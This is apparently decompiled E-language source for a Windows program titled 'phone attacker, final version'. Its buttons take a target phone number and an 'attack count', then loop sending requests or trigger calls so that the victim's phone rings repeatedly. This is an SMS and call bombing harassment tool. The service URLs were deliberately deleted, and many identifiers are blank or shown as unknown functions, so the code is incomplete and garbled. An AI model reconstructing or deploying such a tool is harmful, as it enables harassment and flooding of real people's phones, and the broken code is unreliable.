 ' 文件类型：Windows窗口程序

 ' 程序名称：
 ' 程序描述：
 ' 程序作者：
 ' 邮政编码：
 ' 联系地址：
 ' 联系电话：
 ' 传真号码：
 ' 电子信箱：
 ' 主页地址：
 ' 版权声明：
 ' 版本号：1.0
 ' 创建号：0.0

窗口 _启动窗口 ' 在程序启动后自动调入本窗口
    左边 = 50
    顶边 = 50
    宽度 = 649
    高度 = 648
    鼠标指针 = { 0,0,0,0 }
    标记 = “”
    可视 = 真
    禁止 = 假
    边框 = 0
    底图方式 = 1
    底色 = 15527148 '  0xECECEC
    最大化按钮 = 假
    最小化按钮 = 假
    控制按钮 = 假
    位置 = 1
    可否移动 = 真
    背景音乐播放次数 = 0
    回车下移焦点 = 假
    Esc键关闭 = 假
    F1键打开帮助 = 假
    帮助标志值 = 0
    在任务栏中显示 = 真
    随意移动 = 真
    外形 = 0
    总在最前 = 假
    保持标题栏激活 = 假
    底图 =  ' 已保存到：D:\易语言学习\Data\手机攻击器公开源码.e\_启动窗口_底图
    图标 =  ' 已保存到：D:\易语言学习\Data\手机攻击器公开源码.e\_启动窗口_图标.ico
    背景音乐 =  ' 空
    标题 = “手机攻击器最终版”
    帮助文件名 = “”

窗口 窗口1
    左边 = 50
    顶边 = 50
    宽度 = 381
    高度 = 252
    鼠标指针 = { 0,0,0,0 }
    标记 = “”
    可视 = 真
    禁止 = 假
    边框 = 0
    底图方式 = 1
    底色 = -16777216 '  0xFF000000
    最大化按钮 = 假
    最小化按钮 = 假
    控制按钮 = 假
    位置 = 1
    可否移动 = 真
    背景音乐播放次数 = 0
    回车下移焦点 = 假
    Esc键关闭 = 假
    F1键打开帮助 = 假
    帮助标志值 = 0
    在任务栏中显示 = 真
    随意移动 = 真
    外形 = 0
    总在最前 = 假
    保持标题栏激活 = 假
    底图 =  ' 已保存到：D:\易语言学习\Data\手机攻击器公开源码.e\窗口1_底图
    图标 =  ' 已保存到：D:\易语言学习\Data\手机攻击器公开源码.e\窗口1_图标.ico
    背景音乐 =  ' 空
    标题 = “关于”
    帮助文件名 = “”



.声音 音乐, " ' 已保存到：D:\易语言学习\Data\手机攻击器公开源码.e\音乐", , 


 ' 所需要的支持库：
 ' krnln d09f2340818511d396f6aaf844c7e325 4 4 系统核心支持库
 ' iext2 AF6AD80AA4244A59AFB3D83ECF5173CC 1 1 扩展界面支持库二
 ' iext 27bb20fdd3e145e4bee3db39ddd6e64c 1 2 扩展界面支持库一
 ' HtmlView 5014D8FA6DCA40b68FA626D8183666EB 1 1 超文本浏览框支持库
 ' internet 707ca37322474f6ca841f0e224f4b620 1 0 互联网支持库
 ' spec A512548E76954B6E92C21055517615B0 2 1 特殊功能支持库
 ' xwx CBF69520-5300-43C4-B6D6-C2CF3F2A169B 1 0 xwxyh无限扩展库





.窗口程序集 窗口程序集1, , , 

.子程序 __启动窗口_创建完毕, 空白型, , 
播放MP3 (-1, 相加 (取运行目录 (), “\2.mp3”))



.子程序 _超级按钮1_被单击, 空白型, , 
.局部变量 a1, 空白型, , , 

.如果 (等于 (.内容, “”))
    信息框 (“请输入正确的移动手机号码！”, 0, )
.否则
    .如果 (等于 (.内容, “”))
        信息框 (“请输入攻击次数！”, 0, )
    .否则
        赋值 (.内容, 相加 (“http://”, .内容)) ' 为了保证此攻击器的长久性，所以不得不删除了网址，请见谅！
        .计次循环首 (到整数 (.内容), a1)
            延迟 (500)
            赋值 (., .内容)
            .如果 (等于 (_启动窗口., 真))
                
            .否则
                
            .如果结束
            
        .计次循环尾 ()
        赋值 (_启动窗口., 假)
        信息框 (相加 (“已经向移动手机”, 到文本 (.内容), “发送了”, 到文本 (.内容), “次攻击！”), 0, )
        
    .如果结束
    
.如果结束




.子程序 _超级按钮2_被单击, 空白型, , 
.如果 (等于 (.内容, “”))
    信息框 (“请输入正确的手机号码”, 0, )
.否则
    赋值 (.内容, 相加 (“http://”, 到文本 (.内容), “ ”)) ' 为了保证此攻击器的长久性，所以不得不删除了网址，请见谅！
    未知支持库函数_7 (.内容)
    信息框 (“对方手机将在3秒内响起来。”, 0, )
    
.如果结束





.子程序 _超级按钮3_被单击, 空白型, , 
.如果 (等于 (.内容, “”))
    信息框 (“请输入正确的区号！”, 0, )
.否则
    .如果 (等于 (.内容, “”))
        信息框 (“请输入正确的号码！”, 0, )
    .否则
        赋值 (.内容, 相加 (“ ”, 到文本 (.内容), 到文本 (.内容))) ' 为了保证此攻击器的长久性，所以不得不删除了网址，请见谅！
        未知支持库函数_7 (.内容)
        信息框 (“对方电话已响！”, 0, )
        
    .如果结束
    
.如果结束


.子程序 _超级按钮4_被单击, 空白型, , 
载入 (窗口1, , 真)


.子程序 _图形按钮1_被单击, 空白型, , 
未知支持库函数_6 ()

.子程序 _图形按钮2_被单击, 空白型, , 
赋值 (., 2)


.子程序 _编辑框2_获得焦点, 空白型, , 
赋值 (.内容, “10”)


.窗口程序集 窗口程序集2, , , 

.子程序 _超级按钮1_被单击, 空白型, , 
赋值 (., “tencent://message/?uin=363091028&Site=www.0916net.com.cn&Menu=yes”)


.子程序 _图形按钮1_被单击, 空白型, , 
窗口1.销毁 ()


 ' 不属于任何一个程序集、类模块的函数：
